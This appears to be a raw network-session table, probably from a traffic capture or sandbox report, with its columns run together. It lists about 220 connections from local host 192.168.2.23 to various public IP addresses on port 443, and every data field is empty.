                                                14623192.168.2.2342894128.79.240.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14624192.168.2.233659259.115.21.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14625192.168.2.2342482142.97.199.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14626192.168.2.235461274.127.21.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14627192.168.2.23544169.238.199.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14628192.168.2.235973875.3.137.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14629192.168.2.233913259.50.179.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14630192.168.2.235886871.128.191.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14631192.168.2.23564264.80.200.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14632192.168.2.2349730104.14.230.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14633192.168.2.235805262.202.146.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14634192.168.2.2333840197.127.114.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14635192.168.2.233458886.109.172.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14636192.168.2.2335084223.54.70.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14637192.168.2.2340392128.54.67.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14638192.168.2.2352836192.40.120.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14639192.168.2.235549862.9.140.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14640192.168.2.2345262206.241.85.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14641192.168.2.233741443.157.24.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14642192.168.2.234460832.152.217.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14643192.168.2.235172884.172.200.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14644192.168.2.2342250124.66.152.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14645192.168.2.2355224188.239.34.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14646192.168.2.235608825.153.237.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14647192.168.2.2358462188.244.149.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14648192.168.2.2336464150.74.196.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14649192.168.2.233691239.215.5.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14650192.168.2.235674649.245.9.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14651192.168.2.2358986173.229.91.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14652192.168.2.235226052.12.64.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14653192.168.2.2359228218.113.17.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14654192.168.2.2358236195.111.190.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14655192.168.2.234204018.212.80.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14656192.168.2.2343812172.119.184.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14657192.168.2.2333886146.37.222.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14658192.168.2.2355402197.215.162.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14659192.168.2.2340290122.219.205.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14660192.168.2.235045086.186.124.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14661192.168.2.2338572141.10.133.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14662192.168.2.2344256120.66.217.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14663192.168.2.235049065.115.184.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14664192.168.2.2356684130.228.244.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14665192.168.2.2359778163.165.197.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14666192.168.2.235836814.203.153.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14667192.168.2.2340064189.43.148.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14668192.168.2.23411028.24.85.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14669192.168.2.2354992176.220.115.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14670192.168.2.2359964203.209.42.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14671192.168.2.236019275.2.67.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14672192.168.2.235223288.223.242.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14673192.168.2.23348948.187.253.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14674192.168.2.2340850108.128.75.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14675192.168.2.2360514170.219.253.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14676192.168.2.2354736185.155.144.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14677192.168.2.234306466.125.46.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14678192.168.2.235671639.47.97.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14679192.168.2.234277254.141.178.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14680192.168.2.2359360198.72.57.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14681192.168.2.2340478135.57.128.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14682192.168.2.234694441.144.11.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14683192.168.2.2358140138.88.103.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14684192.168.2.2334764160.175.9.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14685192.168.2.2338858213.113.201.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14686192.168.2.2333424175.26.1.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14687192.168.2.235097077.221.189.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14688192.168.2.2351906118.51.17.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14689192.168.2.23374864.230.112.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14690192.168.2.2351328126.87.187.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14691192.168.2.2342774190.246.77.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14692192.168.2.233971889.76.12.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14693192.168.2.2344694136.47.95.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14694192.168.2.23472041.234.64.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14695192.168.2.2355984110.59.209.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14696192.168.2.2356320118.125.32.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14697192.168.2.2347052136.160.106.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14698192.168.2.234230438.251.237.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14699192.168.2.2342244169.235.115.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14700192.168.2.235817631.172.73.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14701192.168.2.235868024.199.5.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14702192.168.2.235660836.83.107.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14703192.168.2.233731260.244.24.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14704192.168.2.2360664164.83.212.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14705192.168.2.2336956223.0.248.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14706192.168.2.2335070154.217.110.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14707192.168.2.2352616161.147.220.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14708192.168.2.234499099.73.153.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14709192.168.2.2343414186.85.241.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14710192.168.2.2346990147.154.32.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14711192.168.2.2347478169.162.146.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14712192.168.2.235149237.216.179.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14713192.168.2.2349736168.140.42.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14714192.168.2.2347354152.5.213.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14715192.168.2.2342372188.8.183.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14716192.168.2.2345164137.132.70.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14717192.168.2.233986862.57.79.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14718192.168.2.2350478180.104.249.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14719192.168.2.2358090161.89.52.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14720192.168.2.235634860.137.207.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14721192.168.2.2343996120.19.2.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14722192.168.2.2344360107.242.129.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14723192.168.2.2360084193.14.45.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14724192.168.2.233334662.24.199.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14725192.168.2.2353604141.75.166.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14726192.168.2.234840812.70.160.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14727192.168.2.2334836184.88.110.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14728192.168.2.234547245.180.117.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14729192.168.2.2357626144.96.197.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14730192.168.2.2335516204.94.88.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14731192.168.2.235450431.14.137.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14732192.168.2.2355674156.119.126.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14733192.168.2.2341402170.150.212.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14734192.168.2.2359754158.155.37.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14735192.168.2.233663898.103.239.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14736192.168.2.234921880.123.5.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14737192.168.2.235750063.207.113.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14738192.168.2.2344498153.130.140.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14739192.168.2.2358514196.208.150.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14740192.168.2.233311223.6.226.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14741192.168.2.235788660.169.146.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14742192.168.2.2358754171.227.53.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14743192.168.2.2352824191.79.91.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14744192.168.2.234804066.242.84.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14745192.168.2.235325613.133.79.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14746192.168.2.2348412132.11.115.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14747192.168.2.233963814.116.13.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14748192.168.2.234415240.96.98.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14749192.168.2.2333542210.113.218.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14750192.168.2.2343280170.11.85.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14751192.168.2.2357048187.70.184.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14752192.168.2.2360278184.183.179.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14753192.168.2.2357436149.249.140.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14754192.168.2.235123061.243.0.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14755192.168.2.2342936140.197.156.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14756192.168.2.233527673.79.83.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14757192.168.2.233626676.111.220.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14758192.168.2.2353192164.243.64.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14759192.168.2.2357954185.19.230.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14760192.168.2.233653057.21.51.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14761192.168.2.2356680103.96.171.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14762192.168.2.2346608114.106.42.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14763192.168.2.233506876.146.238.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14764192.168.2.2352844106.125.129.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14765192.168.2.2352220116.88.209.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14766192.168.2.2350848174.79.48.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14767192.168.2.236029857.236.220.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14768192.168.2.2358728211.195.5.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14769192.168.2.2340616216.204.44.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14770192.168.2.234335023.194.122.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14771192.168.2.2345302172.43.124.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14772192.168.2.2360576191.182.245.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14773192.168.2.234689062.216.90.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14774192.168.2.2355962158.60.113.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14775192.168.2.23350588.209.219.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14776192.168.2.235957496.135.12.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14777192.168.2.2356744210.16.226.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14778192.168.2.23604948.205.65.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14779192.168.2.233769687.99.179.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14780192.168.2.234511271.252.150.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14781192.168.2.233964236.114.220.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14782192.168.2.2360374203.254.157.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14783192.168.2.2341114210.209.193.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14784192.168.2.235366843.153.215.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14785192.168.2.233681693.64.69.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14786192.168.2.2350412140.237.184.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14787192.168.2.23359788.127.38.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14788192.168.2.234265242.72.228.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14789192.168.2.234572624.162.234.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14790192.168.2.23540541.90.22.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14791192.168.2.233366048.99.51.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14792192.168.2.2359216152.139.86.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14793192.168.2.233515023.196.98.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14794192.168.2.235569234.226.133.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14795192.168.2.2340600178.165.225.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14796192.168.2.2344774145.242.69.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14797192.168.2.2336984114.168.25.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14798192.168.2.2334462144.29.53.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14799192.168.2.2353616192.218.170.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14800192.168.2.23578964.145.111.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14801192.168.2.2347314190.194.8.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14802192.168.2.2354652128.239.170.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14803192.168.2.2336318130.93.73.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14804192.168.2.2346210137.135.122.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14805192.168.2.23399365.250.245.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14806192.168.2.235630672.135.229.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14807192.168.2.234674235.150.25.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14808192.168.2.2348268180.203.187.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14809192.168.2.23588505.217.190.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14810192.168.2.235244445.236.170.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14811192.168.2.2356728119.88.126.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14812192.168.2.235160412.44.138.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14813192.168.2.2339322173.216.237.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14814192.168.2.233827263.247.95.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14815192.168.2.234630443.227.46.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14816192.168.2.234007696.30.157.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14817192.168.2.2339878101.215.137.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14818192.168.2.235528467.154.35.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14819192.168.2.234205648.47.179.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14820192.168.2.2338264213.80.131.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14821192.168.2.235279280.223.223.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14822192.168.2.234405049.195.103.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14823192.168.2.2348436218.153.3.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14824192.168.2.2338340206.86.68.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14825192.168.2.233890425.27.132.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14826192.168.2.2341866128.157.162.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14827192.168.2.2357442170.165.34.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14828192.168.2.2338084101.94.204.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14829192.168.2.234584292.32.12.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14830192.168.2.2335484100.39.129.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14831192.168.2.2351500175.90.211.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14832192.168.2.234395475.108.6.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14833192.168.2.2335690167.141.138.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14834192.168.2.2354056172.242.126.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14835192.168.2.2349894110.121.216.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14836192.168.2.233947485.64.135.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14837192.168.2.2353552160.252.7.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14838192.168.2.235712695.198.213.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14839192.168.2.2343626151.113.173.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14840192.168.2.2336108163.78.95.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14841192.168.2.2350258200.87.53.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14842192.168.2.2356480181.22.186.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14843192.168.2.235994099.28.6.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14844192.168.2.235405823.154.220.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
